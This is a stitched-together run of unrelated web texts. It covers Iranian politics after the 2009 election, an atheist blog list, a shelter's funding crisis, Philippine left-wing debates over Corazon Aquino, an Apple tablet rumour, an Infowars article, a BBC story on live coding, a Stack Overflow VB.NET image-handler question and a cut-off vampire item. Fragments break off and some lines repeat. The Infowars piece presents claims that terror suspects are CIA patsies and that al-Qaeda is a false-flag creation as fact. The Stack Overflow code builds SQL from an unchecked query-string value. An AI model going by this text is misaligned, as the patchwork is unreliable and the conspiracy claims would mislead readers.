With its faith in state - controlled industry shaken by the collapse of the USSR , the Islamist left shifted towards the pro-market , neoliberal policies that had come to dominate the world economy .
Thus , the Islamist left morphed into reformers who emphasized political freedoms , human rights and an easing of state - imposed Islamist behavioral norms .
And with the backing of Rafsanjani and his allies , the reformist candidate , Mohammad Khatami , a former minister of culture , won the 1997 presidential vote by a landslide .
But in his two terms in office , Khatami failed to deliver .
The Islamist right , thanks to support from Supreme Leader Khamanei , controlled all key government ministries and stymied most reforms .
Khatami also failed to protect students in the pro-democracy movement , whose protests were violently attacked by police and the basij , a paramilitary force based in the mosques and controlled by the right .
Pro-reform newspapers were regularly shut down by the authorities , and their editors detained .
In 2004 the clerics ' Guardian Council , which must approve candidates for office , barred 2,000 reformers from running for the majlis , or parliament , including 80 incumbents .
The intellectuals and middle class elements who had high hopes in Khatami felt disillusioned , if not betrayed .
Workers , who were promised little by Khatami , faced much worse conditions .
Khatami's economic program promoted privatization and deregulation , which led to stepped - up attacks on wages and working conditions , even as the traditional bazaar bourgeoisie blocked most economic reforms .
Unemployment and persistent inflation added to workers ' misery .
As the Khatami era wound down , workers began to make their own voices heard through a series of struggles that defied the ban on independent unions .
In January 2004 , 1,500 workers at a copper smelting plant near the village of Khatonabad went on strike and occupied their plant when management fired all but 250 of them .
After eight days , security forces shot into the crowd from helicopters , killing as many as 15 workers and injuring 300 .
Eighty were arrested ; upon their release , they showed signs of torture .
Rather than having a chilling effect on strike action , the repression spurred similar action across the country in a variety of different plants , and a strike in March 2004 that involved up to a third of Iran 's teachers .
Workers often organized these actions by setting up workplace - based charity committees that served as underground unions .
In the northeastern town of Gilan , workers fighting privatization in 2004 revived the workers ' councils , or shoras , that had first emerged during the revolution .
In their 2007 book Iran on the Brink , journalists Andreas Malm and Shora Esmailian interviewed several workers about their struggles .
One of the workers in the important Khodro plant , the largest vehicle plant in the Middle East , explained their brief strike action in January 2004 :
The only thing we want is the right to improve our situation .
We fight for the right to go on strike , to form a union , all these basic democratic rights .
Everything we do must be kept secret .
But we can't just sit twiddling our thumbs , waiting for the Islamic Republic to fall .
We must take the right to organize , practice it , without waiting for someone 's permission .
That means we must be ready to sacrifice , as the people did in Khatonabad .
Perhaps the best - known Iranian workers ' struggle outside the country is that of the Tehran bus drivers , who have braved beatings , arrest and imprisonment for fighting to create an independent union .
In 2005 , the 17,000 - member Syndicate of Workers of Tehran and Suburbs Bus Company refused to accept riders ' fares to protest fare hikes and bad working conditions .
Union leader Mansour Osanloo was arrested ; upon his release , he led another strike in 2006 and was imprisoned soon afterward .
The Islamist right strikes back
Khatami's reform program was seen by the Islamist right as a mortal threat .
To counter it , the conservatives built up networks of former Revolutionary Guards , an elite military force -- as well as the basij , a kind of paramilitary organization intertwined with , and funded by , the mosques and the bazaar bourgeoisie and backed by the national security establishment .
The basij were given official status by the majlis in 1992 .
Later on , they were charged with enforcing religious laws known as Propagation of Virtue and Prohibition of Vice .
" Essentially , this meant ' unleashing ' the basijis as the moral soldiers of the Islamic Republic , more specifically the conservative right factions , " wrote historian and author Mehdi Moslem .
The basij thus helped build the careers of a cadre of Islamist student revolutionaries from the 1970s who had become members of the Revolutionary Guard during the Iran - Iraq War .
One of those war veterans was Mahmoud Ahmadinejad , whose political connections got him promoted from governor of a small province to appointment as mayor of Tehran , where he used the basij to build a political machine .
Khamanei became the sponsor and protector of this younger generation of Islamist rightists , and threw his weight behind Ahmadinejad as the right 's candidate in the 2005 presidential race .
The high rate of abstention from pro-reform candidates , plus some likely vote - rigging , vaulted Ahmadinejad from nowhere into a runoff election against Rafsanjani .
Ahmadinejad presented himself as a populist with a modest lifestyle , in contrast to the very wealthy Rafsanjani , a figure often accused of corruption and whose family dominates the lucrative market for pistachio exports .
Ahmadinejad 's pseudo - populism
The conventional media portrayal of Iranian politics is a contest between the populist Ahmadinejad , who has the backing of the rural poor and workers , versus the middle - class and wealthy backers of the reformers around Mousavi .
In reality , Ahmadinejad 's populism is a pose , notwithstanding his grab bag of local development programs and some highly publicized , pre-election handouts and bonuses for state employees .
Ahmadinejad last year tried to remove subsidies on staple goods for the poor in exchange for higher state benefits -- although inflation would have soon eliminated those gains .
To be sure , Ahmadinejad differs with the reformers about the extent to which Iran 's economy should open to the West and what types of investments should be pursued .
But he shares their neoliberal framework -- and his embrace of privatization bears this out .
As left - wing Iranian scholar Kaveh Ehsani points out , shortly after Ahmadinejad 's 2005 election victory , Supreme Leader Khamanei himself gave privatization a major push by issuing an order reinterpreting the Iranian constitution 's support for a state - dominated economy .
As a result , he writes , " the government was ordered to reduce its share in " non-essential " sectors annually by 20 percent and to privatize some 80 percent of its assets in " essential " sectors -- mining , heavy industry , downstream oil and gas , banking , insurance , energy , communications and even some military industries . "
Ahmadinejad pursued this agenda with gusto .
As journalist Billy Wharton points out , the Iranian president has already privatized the postal service , sold shares in two state - owned banks and a sale of 5 percent of shares in a state - owned steel company .
According to the Iran Privatization Organization , a state ministry , some 247 state enterprises been partly or fully privatized since Ahmadinejad took office in 2005 .
Ahmadinejad has tried to camouflage the privatization process by doling out " justice shares " of stock in privatized state companies to the poor .
These assets , distributed to about 6 million people , were worth $ 2.5 billion in the first two years of Ahmadinejad 's term .
The model here is the privatization process in Russia and Eastern Europe , where crooked entrepreneurs were able to buy up the stocks for cheap to create huge new private monopolies based on former state assets .
In any case , stocks thinly scattered among the poor wo n't provide much help for the 8 million people ( out of a population of 76 million ) who live in extreme poverty .
Nevertheless , as Ehsani points out , the state still dominates the Iranian economy , with 500 big state - owned companies that account for 76 percent of the national budget and two - thirds of Iran 's gross domestic product ( GDP ) .
That means the real fruits of privatization have yet to be plucked by private Iranian capital -- so the question of who will benefit from the sell - off of state assets was a looming issue behind the 2005 vote .
Indeed , if Ahmadinejad succeeds in handing the benefits of privatization to his allies in the basij and the security apparatus , it could reconfigure Iranian capitalism .
The Islamist right and the war veteran generation could make the transition from their careers in the national security apparatus and sanctions - busting smuggling operations into entrepreneurs , much as the Stalinist bureaucrats did in Russia during the 1990s .
That 's a threat to established business tycoons like Rafsanjani and his allies , who could be marginalized by new players .
And at the same time , the reformers around Mousavi would lose the strategic levers that they believe they need to restructure Iranian capitalism on a more rational basis .
Election , coup and resistance
All this set the stage for the sharp split in the Iranian ruling class around the June 12 vote .
Rafsanjani went all out for his old rival Mousavi in order to stop Ahmadinejad and Khamanei .
And Mousavi used televised debates to cut into Ahmadinejad 's claim of economic success , highlighting the difficulties facing workers and the poor .
The strategy worked , producing a late surge for Mousavi in the form of massive election rallies in Tehran and other cities that brought in supporters far beyond the stereotypical middle - class base of the reformers .
Young people were particularly energized - - not only because of Mousavi 's promise of a more liberal stance on social questions , but because of their terrible economic circumstances .
In recent years , the jobless rate for men in their early 20s has been above 20 percent .
For women that age , unemployment is estimated at 40 percent .
This display of mass support for Mousavi panicked Ahmadinejad and Khamanei into announcing an overwhelming victory for the incumbent in order to avoid a second - round election contest between the two .
In this way , what began as a faction fight between two wings of the ruling class turned into a virtual coup .
Since the June 12 coup , the protests by millions in the street have been battered down by repression carried out mainly by basij thugs on motorcycles .
The video recording of the murder of a young woman , Neda Agha Soltan , has become a symbol of the mass outrage over the repression .
While the mass protests have subsided , smaller demonstrations continue .
And the splits in the Iranian ruling class have meant that the repression , while terrible enough , is n't nearly as bloody as it could have been .
That 's a sign that Ahmadinejad and Khamanei are still somewhat tentative in their clampdown .
If they show weakness by making some sort of power - sharing deal with Mousavi and Rafsanjani , they risk encouraging the movement to push for even greater change .
But if they move decisively against Mousavi and Rafsanjani with arrests and imprisonment , the regime would shed whatever legitimacy it has left , and become simply a police state .
There are rough parallels here with the revolutionary crises in Eastern Europe under Stalinism , such as in Hungary in 1956 and Czechoslovakia in 1968 .
There , divisions between reformers and hard - liners led each side to try to mobilize mass support , thereby destabilizing the entire system .
Ultimately , such splits led to paralysis and collapse in the revolutions of 1989 .
In the case of Iran , a dispute over a stolen election has opened the way to a mass upsurge for democracy and a movement that wo n't simply evaporate under repression .
The size and character of the movement inevitably raises social questions and the need for the independent organization of the working class and the revival and extension of workers ' struggles that emerged in recent years -- most recently , in the illegal May Day protests earlier this year .
The pro-democracy movement among students , the underground unions and the street protesters that emerged in recent weeks together have the potential to interact to create a new movement for democracy and revolutionary change .
The international left must do all it can to support that struggle .
Religious Copouts
Any time someone writes something critical of religion they will get one of two different responses : apologetics and / or copouts .
If a religion needs apologetics then it was clearly not created by “ the most intelligent thing ever ” and can be ignored .
Religious copouts are appeals to magical forces or the issue being some failure on the doubter ’s part that cannot be proven and removes the burden of proof from the commenter .
Here are some of the ones I see often and annoy me the most :
You ’ve already been given all the evidence you need .
Then why the hell am I asking for more ?
Then why the hell am I asking for more ?
You were n’t sincere enough in your prayers .
How can anyone make that kind of judgment ?
Are these people suddenly psychic ?
Do they know they can make $ 1,000,000 for that over at the Jame Randi Educational Foundation ?
How can anyone make that kind of judgment ?
Are these people suddenly psychic ?
Do they know they can make $ 1,000,000 for that over at the Jame Randi Educational Foundation ?
You have to believe first and then you ’ll see the evidence .
I can no more make myself believe without evidence in a god then I could that there are communist reptilians controlling the U.N.
I ’m not capable of believing without an acceptable amount of evidence .
I can no more make myself believe without evidence in a god then I could that there are communist reptilians controlling the U.N.
I ’m not capable of believing without an acceptable amount of evidence .
God hides the true message of the scripture from you unless you have the holy ghost .
Let me get this straight .
The only way to become a Christian is to read your bible , and the only way to read your bible is to be a Christian .
That ’s real smart .
Let me get this straight .
The only way to become a Christian is to read your bible , and the only way to read your bible is to be a Christian .
That ’s real smart .
God is talking to you , but you are n’t listening .
I ’m listening as best as I can , if that ’s not good enough for your god then I guess I ’m just screwed .
I ’m listening as best as I can , if that ’s not good enough for your god then I guess I ’m just screwed .
Your heart is hardened against God .
No , I ’m just a skeptic and I do n’t have the burden of proof .
You do .
No , I ’m just a skeptic and I do n’t have the burden of proof .
You do .
I ’ll pray for you .
This usually pops up when the believer has exhausted all of their arguments and just wants to throw out a final passive - aggressive “ fuck you ” .
My usual response is “ and I ’ll think for you ” .
I ’ve very likely missed some “ good ” copouts so if you come up with one put it in the comments .
The bright red of the peppers and the bright white of the rice noodles will open your appetite .
You can also add a touch of green with fresh
2 22 Add to Favorites
No one has contributed to this discussion in over 9 years .
Are you sure you have something valuable to add to revive the existing conversation ?
Consider starting a new topic instead .
Otherwise , please be thoughtful , detailed and courteous , and adhere to our posting rules
Because of lagging donations , the Jesus House shelter can’t pay its bills and employees have gone three weeks without paychecks , officials with the shelter said .
The shelter serves mentally ill homeless people and distributes food baskets to the needy .
Gas to the property was nearly shut off this week after the bill topped $ 2,000 .
An anonymous donor paid the balance , but the charity owes thousands more for other utilities and to pay workers .
Five workers were laid off this year , and the remaining six have worked without pay for weeks , although they ’ve kept health insurance benefits .
But chief executive officer Janis Mercer said the doors will remain open .
About 75 people live at the shelter and have no other place to go .
" If we have to sit in the dark , take cold showers and eat sandwiches , we wo n’t close , ” Mercer said .
She said holiday season donations usually bring in about $ 650,000 , but this past season only $ 100,000 was collected .
Also , some regular donors have ceased helping because of economic woes .
Aaron Cotton manages the food warehouse and is struggling to pay his personal bills .
He could n’t buy his teenage son new clothes for school .
But Cotton has no plans to seek other work .
" I like what I do .
I like helping other people .
I believe we will get through this , ” he said .
Corazon Aquino ( far right ) in 1986 .
By Reihana Mohideen
August 14 , 2009 – Former president of the Philippines Corazon Aquino died on August 1 .
Following the 1983 assassination of Benigno Aquino , her husband , Cory Aquino became the Philippine ’s leading bourgeois opposition figure to the US - backed dictator Ferdinand Marcos .
She stood against Marcos in the 1986 presidential election .
After Marcos was proclaimed the winner of the blatantly rigged election , a mass uprising – dubbed the ``people power revolution ’’ -- overthrew Marcos and Aquino became president .
She was in office from 1986 to 1992 .
The Philippines left ’s reaction to the death of Corazon Aquino has been intriguing .
The Communist Party of the Philippines ( CPP ) did a complete about - turn , recanting its previous position that Cory Aquino was a representative of the reactionary classes .
The CPP - influenced National Democratic Front statement laid the blame for the massacre of unarmed peasants at Mendiola during the Aquino administration ( one of the most tragic episodes in the history of the left in the Philippines ) at the feet of the “ military and police [ who ] caused the termination of the ceasefire agreement between the Government of the Republic of the Philippines and the NDFP when they indiscriminately fired on the peasants and their urban supporters marching for land reform on January 22 , 1987 . ”
Thus a massacre became an “ indiscriminate firing ” and the Aquino administration was relieved of all responsibility in a stunningly hypocritical rewriting of history .
As for Cory Aquino ’s active support to keep the US military bases in the Philippines in opposition to moves by the Philippines Senate to remove the bases , the NDF statement had only this to say : “ She was openly critical of the long - running support of the US for the Marcos dictatorship in exchange for the aggrandizement of US economic interests and the continuance of the US military bases . ”
Not a word on her pro-US bases stance after she came to power .
Even those of us now well - accustomed to the CPP ’s unashamed pragmatism swallowed hard while reading the NDF statement signed by top CPP leaders including Jose Maria Sison .
However , this is not the first time that history has been rewritten , especially by the CPP , to suit the various twists and turns in its political line .
Partido Lakas ng Masa
The Partido Lakas ng Masa ( Party of the Labouring Masses ) , on the other hand , issued a statement by its chairperson Sonny Melencio outlining its assessment of the main characteristics of the Cory Aquino regime .
It read in part : “ Cory Aquino was the icon of the revival of pre-dictatorial ‘ elite democracy ’ in the country .
She was the symbol of a ‘ people power revolution ’ which deposed the dictator Marcos but failed to institute a people ’s power government .
The governmental alliance that she established under her ‘ revolutionary government ’ quickly transformed into a government headed by elite groups previously persecuted by the Marcos dictatorship . ”
Most importantly the PLM statement implied that what was really posed was the possibility of the left leading the anti-dictatorship movement and taking political power .
“ While Aquino was seen as leading the downfall of the much - hated Marcos dictatorship , it is classes and not individuals that make history .
There were various factors and players at work who made the ouster of Marcos a reality .
Edsa 1 [ the 1986 people power uprising ] itself was a confluence of a military mutiny and a people ’s uprising .
The build - up to Edsa 1 was a series of protests , sacrifices and small - scale rebellion led by the Left and other progressive forces .
It is unfortunate , however , that the Left which has sacrificed the most during the period of the dictatorship , ended up ‘ politically isolated ’ due errors related to its strategy and tactics . ”
It concluded by arguing that the current crisis facing the people under the rotting carcass of the current regime of President Gloria Macapagal is a part of Cory ’s legacy : “ In a sense , Gloria Macapagal ’s rise to power was a product of the limited and distorted character of Cory ’s ‘ revolution ’ ” .
Akbayan
The left electoral party Akbayan did not release a formal statement , but some of its individual leaders attempted to expose the real record of the Aquino administration , such as its active opposition to the removal of US bases and the burdensome legacy of debt left to the future generations , enshrined in what became known as the ``Cory constitution ’’ , which made the annual repayment of the foriegn debt mandatory .
One of the leaders of Akbayan argued that the problem was bad advisors who surrounded Cory Aquino .
Others argued that despite its anti-people record , the Aquino administration was still seen by the people as a representative of the ideal of freedom and democracy .
`` Who could forget the Aquino governments pro-US military bases stance ?
Who could not recall her government ’s US - backed low intensity conflict and total war policy against `insurgents ’ which in truth harmed the masses more than its perceived enemies ? ” , asked Emanuel Hizon , an Akbayan leader , in another article .
He went onto explain the mass support for Cory “ … this woman despite her regime ’s numerous social and economic transgressions is so loved and cherished by a people representing three generations of Edsas .
Its not so much because she is religious , a mother - like figure to many , a glorified widow or simply a martyr ; beyond the labels , our ideological flexing and the comfortable branding of pundits , Cory has been duly recognized by the people as an icon in their transition from despotism to rule of law , their struggle from tyranny towards a sense of freedom and democracy .
Cory is first and foremost the representation of that ideal , of that difficult journey towards democratization , of that collective national experience . ”
And it did not stop there .
`` She will also be remembered as a defender of that particular form of democracy , flawed and wanting it may be in so many ways , not measuring up to our Marxist concept of a democratic archetype .
From people power 2 which removed an incompetent and corrupt regime up to her participation in the fight to throw out the illegitimate Arroyo regime and its sinister plan to amend the constitution , Cory will be remembered and respected as a person who despite her privileged status joined the people in their most trying and important political junctures . ”
No lessons reviewed
What struck me most about the left analysis of Cory Aquino and her years , however , was the lack of any serious assessment of the lessons that this critical period in history holds for left strategy today .
In this sense the analysis has been ahistorical .
In most cases it has n’t gone beyond the role of Cory Aquino as an individual or the reviewing of some facts of her administration ’s record , instead of analysing and attempting to understand the lessons they hold for left strategy today .
Does this mean that the left has nothing to learn from the revolution that overthrew Marcos and stabilised the system of elite rule ?
Or is this a form of denial , a refusal to collectively look at the period head on and draw the relevant lessons for today ?
After all , the Aquino years were a traumatic period for the revolutionary left , having to come to terms with it's own failure in losing the leadership of the political revolution , as well as having to suffer ongoing repression with the massacre of farmers in Mendiola , as well as the assassination of leaders of the movement , Rolando Olalia and Lean Alejandro .
The people power revolution was a double - edged sword for the revolutionary left : a partial victory in building a mass movement that overthrew the dictatorship , but also a defeat of the left ’s strategy .
Most importantly , today , we continue to live with the legacy of all this .
I think that the left has only made a partial assessment of the 1986 revolution and its aftermath .
I have always believed that a more comprehensive assessment is necessary , because it is of the utmost importance that we learn the lessons for today .
As historical materialists our starting point should be , as the Partido Lakas ng Masa statement correctly points out , “ it is classes and not individuals that make history ” .
We should also internalise that Napoleonic dictum that ``Defeated armies learn well ’’.
This is something that the Cuban revolutionaries managed to do in the aftermath of the defeat of the Moncada rebellion on July 26 , 1953 , and then went on a few years later to lead a successful insurrection resulting in the Cuban Revolution in 1959 .
I think that the Philippines left is still grappling with this and is an army that has not , as yet , learned its lessons well .
Some lessons and more questions
Some lessons have been drawn by sections of the left and its important that these are summarised .
While these positions are differently nuanced amongst the various political parties or blocs , the main lessons can be identified as follows : ( i ) The importance of the left intervening in the electoral arena , and ( ii ) the rejection or questioning of the Maoist strategy of protracted people ’s war .
Others have also pointed to the important role that the military plays in an insurrection or political revolution .
The transitional demand for a ``Transitional Revolutionary Government ’’ put forward by Laban ng Masa during the height of the struggle to oust the Gloria Macapagal regime was also partially referenced by the government of Cory Aquino which was then referred to as a ``revolutionary government ’’ .
A key lesson of the 1986 revolution is the importance of the electoral tactic in the mobilisation of the masses and the capture of government and political power .
The CPP ’s ultraleft , electoral boycott tactic was a fatal error leading to the isolation of the left and the victory of the elite in the anti-dictatorship upsurge .
If the CPP had fully participated in the election campaign and used the electoral tactic to the fullest extent possible to mobilise the masses , the outcome of the revolution would have been different .
Aquino ’s and the elite forces ’ victory in February could have been followed by a revolutionary October , as the CPP chair Sison then promised .
This never came to pass and instead we experienced a period of decline of the revolutionary movement .
The left learned this lesson hard and through the 1990s started to run its own candidates and participate in the electoral arena .
However , the overall character of the left electoral intervention has been to play the electoral card in an extremely conventional way , within the boundaries set by traditional bourgeois politics , that it has become impossible to differentiate the left ’s electoral campaigns from those of the trapo [ traditional elite ] candidates .
`` We have to play the game ’’ was the justification given .
And the left certainly did ``play the game ’’.
So much so that the CPP ’s electoral organisations were the de facto party list of choice of the Gloria Macapagal regime in the 2001 and 2004 elections .
The mobilisation of the masses has not been the aim , but the winning of seats by any means necessary .
The revolutionary movement in Latin America has once again placed the electoral tactic on the agenda .
In Venezuela and Bolivia the revolutionary movement used the electoral tactic to capture government and then proceed to extend and consolidate revolutionary political and state power .
This lesson and experience is now being extended to Nicaragua , El Salvador , Uruguay and Ecuador .
The lesson for us in the Philippines is that the electoral tactic , under certain conditions , such as during an extreme crisis of elite rule and a sharp rise in the class struggle ( as was the case in the period leading to the collapse of the Marcos dictatorship ) , can be used to mobilise the masses to create a major breach in the system of elite / bourgeois rule .
This is a key lesson of the 1986 revolution and a lesson from the advances being made by the revolutionary movements in Latin America today .
However , as long as we use the electoral tactic purely within the boundaries set by trapo politicians , our political gains will be extremely limited and our movement will suffer the problems of opportunism , that so marks the left ’s electoral interventions today .
We also need to start by asking ourselves the right questions in the process of trying to draw useful lessons .
Why is it that sections of the elite have time and again been able to use populist rhetoric , to mobilise and lead the masses to serve their own interests , including in winning leadership from the left ?
For me this is a key question , or maybe even the key question , that needs to be posed over and over again , especially during periods of crisis such as the one we face in the Philippines today .
[ Reihana Mohideen is head of Partido Lakas ng Masa ’s international department .
This article first appeared at Socialista Feminista . ]
According to a nameless analyst who claims to have handle the heavily rumor tablet device , as reported by Barron ’s , this new thing will play games .
Furthermore , the tablet is still on for a September unveiling , hitting store shelves somewhere in November .
The analyst reports that the Apple tablet , with a 10 - inch touch screen , is designed to be used as a “ home media hub , ” streaming content over Wi-Fi connections and connecting with other Apple devices in the house .
It ’s also reportedly designed to play games and to be used as a gaming device .
What ’s also interesting about the report is that the analyst claims the device will be marketed somewhere in the $ 699 - $ 799 range .
[ Via Engadget , Develop ]
Disclaimer
This is a personal web site and as such reflects only the opinions of its authors .
Statements on this site do not represent the views or policies of anyone other than the person posting .
Kurt Nimmo
Infowars
August 3 , 2009
The Associated Press reports today that the supposed North Carolina terrorism suspects may be tried with secret evidence .
The case may involve “ classified material that will raise national security issues if given to their defense attorneys , ” federal prosecutors told the AP .
The men charged in the case are to appear in federal court on Tuesday .
Is the government is attempting to keep secret Daniel Patrick Boyd ’s role as a patsy ?
The government filed a motion under the Classified Information Procedures Act ( CIPA ) , which sets guidelines for the disclosure of sensitive information .
CIPA is not intended to infringe on a defendant ’s right to a fair trial or to change the existing rules of evidence in criminal procedure , but it appears that is precisely what will happen if the government is permitted to keep evidence secret in the case .
In 1996 , the government used CIPA in its prosecution of Timothy McVeigh and Terry Nichols in the Oklahoma City bombing trial ( see McVeigh ’s 3/96 Memo Summarizing The Classified Information Procedures Act ; see also Stephen Jones ’ Others Unknown , p.133 ) .
In 2007 , Nichols revealed that McVeigh was connected to government provocateurs .
It is entirely possible a similar situation exists in the North Carolina case .
The AP notes :
Prosecutors have n’t said whether the terror suspects had any specific timelines or targets , although the indictment said some of them went on trips over the past three years to Jordan , Kosovo , Pakistan and Israel “ to engage in violent jihad . ”
The indictment said the elder > strong > Boyd received terrorist training in Pakistan and Afghanistan two decades ago and , more recently , recruited followers in North Carolina .
( Emphasis added . )
It is a well - established fact these training camps were funded by the Saudis at the behest of the CIA and managed by Pakistan ’s ISI .
As documented by Jason Burke ( Al Qaeda : The true story of Radical Islam , p. 77-78 ) , numerous camps were built at Zhawar Khili , Jali , Pabbi , Khaldan , Ali Khel , Tora Bora and elsewhere along the Afghanistan - Pakistan border .
The training camps were maintained by a handful of Mujahideen , including Osama bin Laden ( his primary camps were named Badr I and Badr II ) and Gulbuddin Heckmatyar , a trusted CIA - ISI asset that received a lion ’s share of covert funding .
In the 1980s , CIA officials often visited these camps , according to research conducted by B. Raman of the South Asia Analysis Group .
[ efoods ]
Ahmed Rashid , author of Taliban : Militant Islam , Oil and Fundamentalism in Central Asia , estimates that after 1982 more than 100,000 Muslims from dozens of countries received political or military training in the CIA - backed camps of Pakistan and Afghanistan .
Recruits included Arabs , Pakistanis , Kashmiris , Filippinos , Bosnian Muslims , Uighurs from Xinjiang in China .
According to the current Secretary of Defense , Robert Gates , in the mid-80s the CIA examined ways to increase the participation of these internationally recruited Islamic fighters , including the formation of some sort of “ international brigade ” ( see Steve Coll , Ghost Wars : The Secret History of the CIA , Afghanistan , and Bin Laden , from the Soviet Invasion to September 10 , 2001 , p. 146 ) .
A brigade of patsies and useful idiots , specicially organized to put a face on false flag terrorism , would later be created , dubbed “ al - Qaeda ” ( after a Mujahideen database ) and used for propaganda purposes in the manufactured GWOT , or “ global war on terrorism , ” designed as a pretext to destroy societies in the Middle East unamenable to the bankers and also construct a police state and pervasive surveillance apparatus at home .
According federal prosecutors , Daniel Patrick
Boyd are others were present at these CIA - ISI micro-managed camps in the late 80s .
It appears there is something related to their presence in Afghanistan and Pakistan federal prosecutors want to keep secret and not have introduced during the trial .
Is it possible the government wants to prevent any mention of the possibility Boyd and his alleged co-conspirators are in fact CIA operatives or more likely duped patsies and mental deficients ?
If so , it would hardly be a historical precedent .
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
This computer scanner by Datamancer differs from the others in several ways .
For one , it looks like a regular book when closed , which makes the device very easy to hide .
Another less - obvious feature is a nifty locking mechanism that prevents snoopers from getting in .
Continue reading for one more picture .
These three groups may help debunk the myth of success as a simple product of intrinsic intellect , for they represent three different races and histories .
In the debate over nature and nurture , they suggest the importance of improved nurture  which , from a public policy perspective , means a focus on education .
Their success may also offer some lessons for you , me , our children  and for the broader effort to chip away at poverty in this country .
Richard Nisbett cites each of these groups in his superb recent book , “ Intelligence and How to Get It . ” Dr. Nisbett , a professor of psychology at the University of Michigan , argues that what we think of as intelligence is quite malleable and owes little or nothing to genetics .
“ I think the evidence is very good that there is no genetic contribution to the black - white difference on I.Q. , ” he said , adding that there also seems to be no genetic difference in intelligence between whites and Asians .
As for Jews , some not -very - rigorous studies have found modestly above - average I.Q. for Ashkenazi Jews , though not for Sephardic Jews .
Dr. Nisbett is somewhat skeptical , noting that these results emerge from samples that may not be representative .
In any case , he says , the evidence is overwhelming that what is distinctive about these three groups is not innate advantage but rather a tendency to get the most out of the firepower they have .
Image Nicholas D. Kristof Credit ... Fred R. Conrad / The New York Times
One large study followed a group of Chinese - Americans who initially did slightly worse on the verbal portion of I.Q. tests than other Americans and the same on math portions .
But beginning in grade school , the Chinese outperformed their peers , apparently because they worked harder .
By Jason Palmer
Science and technology reporter , BBC News
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
It might just be the most conceptually complex way of making music that modern man has yet devised .
But that is the challenge of live coding - the process of writing computer code , in real time , to compose and play music or design animations .
" It 's not just a passive process , not just someone creating sounds , which is the problem with electronic music - because people do n't really see what it is that the musicians are doing , " says Dave Griffiths .
Dave is a live coder and a performer in a night of live coding held in a south London pub , organised by the collective Toplap .
" Live coding brings the audience closer ; they can see that you 're making something in front of them , " he says .
The furious coding is also projected onto a screen for the audience , making the programming as much - or more - of the performance as the music it codes for .
Bug bare Live coding eschews the normal route of developing computer code , which starts with writing a program in a " high - level " language - one that looks not too far removed from English .
Then , the programmer compiles it , meaning it is converted by another program into a language not too far removed from the 1s and 0s of computing .
The purist 's version of live coding starts with a blank screen
Then they run it .
If anything it should go wrong - and anyone who has ever done any programming will know how frequent this is - they get nothing out .
A crash .
Epic fail .
Because the software that live coders use is designed for a compile - free , real - time use , the performers face this prospect much less often .
But it does happen , Dave tells me .
" That 's what keeps it exciting , " he says .
A crash means a deadly uncomfortable silence in front of an expectant audience , which on the night includes quite a few people who have simply stumbled upstairs into the pub 's function room to see what live coding is .
Jamming frequency
Up first is Chris McCormick , whose performance is a world premiere .
Live coding has its own , custom - made programming languages , some of which are as simple as a 1970s computer interface , with lines of code entered onto a black screen .
Others might be more visual , with musical directions encoded as shapes that are arranged freehand on a screen .
" It might not be any easier to understand but it 's visually more interesting than just text , " Dave says .
Some software packages for live coding are more visual than others " But then there 's also something nice about the purity of just having lines of code . "
Chris is a fan of the more visual software , but he follows the live coding purist 's tradition of starting off with a blank screen .
As he adds shapes corresponding to sounds , filling them in with numbers that finely tune their timbre or frequency , his stage fright is not in evidence .
He says that live coding is like building the computer programs that are commonly used to make electronic music ; it is " one more level of abstraction " from the music itself .
" Making boring techno music is really easy with modern tools , " he says , " but with live coding , boring techno is much harder . "
As if to prove the point , the performances after Chris 's held no full - fledged , boring techno .
Dave and his collaborator Alex McLean perform a live - coding duet , each of them running independent programs .
They listen to each other 's output and work separately but together in a way that is conceptually not so different from two saxophonists " trading fours " .
' Engaging ' Matthew Yee -King and his co-performer Click Nilson have opted to stray from standard live coding this evening , instead performing their " algorithmic choreography " .
Instead of code entered on the screen resulting in sound , it results in Click performing dance moves .
It 's less high - tech and more conceptual performance art .
But they share the others ' passion about what it is that live coding taps into .
Live coders can " jam " together as with traditional instruments " I 've done all sorts of things with a computer and a stage , but [ live coding ] feels like it 's really native to computing , " says Matthew .
" It 's like a virtuosic exploration of the guts of the machine , in the same way that a piano virtuoso engages with the machine they 're using .
" You 're deeply engaging with the machine in a way that you do n't if you 're using someone 's ready - made software . "
And this seems to be the point ; no one has come expecting to make or to hear heroically composed , massively melodic and moving music .
It 's more an exposition of what can be done starting from absolutely nothing with a novel , stripped - down set of sonic tools .
Dave sums it up : " It 's such a new thing , and we do n't know if we 're any good at it - it may well be that a new generation comes along and just blows us away " .
The group is looking into doing a tour of sorts by playing in planetariums across the country , with the first in September at Plymouth Planetarium .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
I 'm working on a simple image tagging and searching app .
I 've got my images uploading to the DB , the tags being applied , but am failing when I pull them back - the images do n't render .
I found this here on SO , but I 'm not able to get it working .
I think I am perhaps misunderstanding handlers .
In short , in the code behind , I 'm creating an ASP : Image , setting its imageurl to the handler with the id of the photo , and then adding that control to an ASP : Placeholder .
When the page renders , I get , in IE , that little red x no image thing , and in FF , nothing .
One thing that gets me thinking I 'm missing something is that a breakpoint in my handler code is never hit .
So it 's even getting executed .
Right ?
Anyone know what I 'm doing wrong here ?
Thanks .
Here 's my handler
Imports aapeClsLib Imports System .
Web Imports System .
Web.
Services Public Class photos Implements System.Web.IHttpHandler Sub ProcessRequest( ByVal context As HttpContext ) Implements IHttpHandler.ProcessRequest Dim img As Byte( ) = getImage ( context.Request.QueryString ( " ID " ) ) context .
Response.Clear ( ) context.Response.ContentType = " image /jpeg " context.Response.BinaryWrite(img ) context .
Response .End () End Sub ReadOnly Property IsReusable ( ) As Boolean Implements IHttpHandler .
IsReusable Get Return False End Get End Property Private Function getImage ( ByVal id As String ) As Byte ( ) Dim img As Byte ( ) Dim strSql As String = " select ph_photo from photos where ph_id = " & id Dim dt As DataTable = sqLiteData.getDataTable(strSql ) img = CType( dt.Rows (0 ) ( 0 ) , Byte ( ) ) Return img End Function End Class
and where I 'm sticking it in my placeholder
Two physicists have published an academic paper where they demonstrate , by virtue of geometric progression , that vampires could not exist , since they would almost immediately deplete their entire food supply ( a.k.a , all of us ) .
Advertisement
If you 've ever read Salem 's Lot ( or seen the lame Starsky and Hutch - era miniseries adaptation starring David Soul ) , then you know that after a vampire decides to settle in your town , the undead begin to multiply at an alarming rate ( he bites two friends , who bite two friends , and so on , and so on… ) .
Putting aside for a moment the issue of how that would impact neighborhood property values , this phenomenon raises an even more pressing question :
